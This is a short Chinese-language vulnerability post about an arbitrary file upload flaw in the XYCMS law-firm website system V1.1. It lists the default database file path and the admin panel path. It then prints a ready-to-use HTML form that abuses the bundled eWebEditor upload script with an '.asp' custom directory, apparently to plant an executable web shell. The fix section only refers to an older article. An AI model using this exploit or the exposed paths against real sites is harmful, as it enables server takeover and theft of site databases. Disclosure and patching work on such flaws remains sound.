by Mr.DzY from www.0855.tv
源码简介:
XYCMS律师事务所建站系统包含事务所简介、律师风采、新闻中心、服务领域、典型案例、法律咨询、资格认证、联系我们等栏目。
后台功能: 企业信息管理:包括基本信息管理,添加,在线报名信息管理,问答中心信息管理 新闻中心管理:管理新闻信息内容,管理相关分类,添加或者删除 律师风采管理:对律师事务所成员进行管理,可添加,删除等操作
源码下载: http://www.2cto.com/ym/201109/29273.html
官方网站:http://www.yuleroom.cn 默认DATA: http://www.2cto.com /xydata/xycms.mdb 默认后台: http://www.2cto.com /system/index.asp
exploit:
<form action=" http://www.2cto.com /system/xyeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form>
修复:上传漏洞参见本站以前文章 PS:由于在1.0版本中,有牛牛发布了若干个问题: http://www.2cto.com/Article/201102/83752.html ,我就不一一说了。 这个是没说的,所以补充下。有点鸡肋,如有雷同,纯粹意外。
查看更多关于XYCMS律师事务所建站系统V1.1上传漏洞及修复 - 网的详细内容...